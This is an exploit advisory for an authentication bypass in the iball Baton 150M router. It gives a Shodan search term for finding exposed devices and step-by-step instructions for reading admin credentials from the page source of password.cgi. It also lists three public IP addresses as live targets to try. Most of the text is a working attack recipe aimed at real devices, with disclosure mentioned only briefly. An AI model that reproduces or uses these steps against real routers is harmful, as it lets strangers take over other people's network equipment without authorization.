== Title: iball Baton 150M Wireless Router - Authentication Remote Bypass
== Date: 31/08/2017
== Product: iball Baton 150M Wireless-N ADSI.2+ Router
== link: http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
== Credit: Indrajith.A.N - Informacion - Anonymous
== Dork: Iball Baton 150M
=== Results: 1,297 aprox...
== How to use: visit page "https://www.shodan.io/", login user and pass account, later loggin, search Iball Baton 150M,
== Firmware Version : 1.2.6 build 110401 Rel.47776n
== Hardware Version : iB-WRA150N v1 00000001
=== Proof Of Concept:
================
=== 1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
i.e 172.20.174.1
=== 2) Now just append password.cgi to the URL i.e
http://172.20.174.1/password.cgi
=== 3) Right-click and View Source code which disclsus the username, password
and user role of the admin in the comment section
=== 4) Successfully logged in using the disclosed credentials
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
== D3m0$:
-- view-source:http://59.89.76.155/password.cgi
-- view-source:http://103.61.202.185/password.cgi
-- view-source:http://122.173.74.202/password.cgi
Disclosure Timeline:
======================================
Vendor Notification: March 5, 2017